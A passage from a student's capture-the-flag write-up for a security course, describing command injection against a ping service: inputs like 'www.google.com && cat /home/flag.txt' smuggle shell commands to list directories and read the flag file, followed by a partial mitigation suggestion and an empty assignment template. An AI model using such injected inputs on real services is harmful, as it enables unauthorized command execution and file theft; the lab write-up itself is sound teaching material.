nbathras/389Rfall18/week/4/writeup/README.md

 `bin boot dev etc  homelib lib64 media mnt opt proc root run sbin srv sys tmp usr var`

+I then made the assumtion that the flag would be in the users home directory because that is where many user based files are stored so I ran another ls command:

+`www.google.com && ls /home/`

+Which gave me:

+`flag.txt`

+I then read that file using the command:

+`www.google.com && cat /home/flag.txt`

+Which then gave me the ouput "Good!
+Here's your flag: CMSC389R-{p1ng_as_a_$erv1c3}" and thus the flag.

+I have two suggestions for Fred that he could implement quite easily to prevent this kind of vulnerability.

+First, he could implement a system that performs proper input validation

 ### Part 2 (55 pts)
 *Put your writeup >= 200 words here in response to part 2 prompt.
 Your code for part 2 should be copied into a file in the /writeup directory and pushed there as well*